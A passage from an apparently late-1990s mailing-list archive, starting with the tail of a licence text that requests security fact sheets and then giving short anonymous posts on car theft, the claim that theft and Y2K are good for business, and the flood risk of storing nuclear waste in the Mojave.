encryption. The weaker version must be clearly marked as such (i.e.,
"Widget 2.4 Export" vs. "Widget 2.4").
Fact sheet: Authors of products using CPL-covered code are requested but
not required to create a sort of security fact sheet detailing the
technical aspects of the product's security features --
* algorithms and key lengths * a precise description of the breadth of the security features
* a description of the threat model used in the design process

@_date: 1998-09-30 22:03:09
@_author: Anonymous 
@_subject: No Subject 
Why, if the ignition-controllers of cars are CPUs, aren't cars theftproof without a David Honig
Irvine Design Teleoffice

@_date: 1998-10-01 04:53:17
@_author: Anonymous 
@_subject: Why is the world not perfect? 
The bastards (a term which collectively includes insurance companies,
police, car manufacturers and a host of others) make vast amounts of
money on the basis that your car is stolen regularly.
Scheduled Disasters are good for business. Whoever it was who had the
idea for a Y2K bug is currently minting it.

@_date: 1998-10-01 14:21:37
@_author: Anonymous 
@_subject: I thought of an initialy regulated industry!... 
So what do you do when it rains?
It does rain in the Mojave desert, you know.  And it rains hard,
in the summer thunderstorm season.  That's a lot of water to sluice
away radioactive material into the washes and arroyos, leading down to
populated areas.
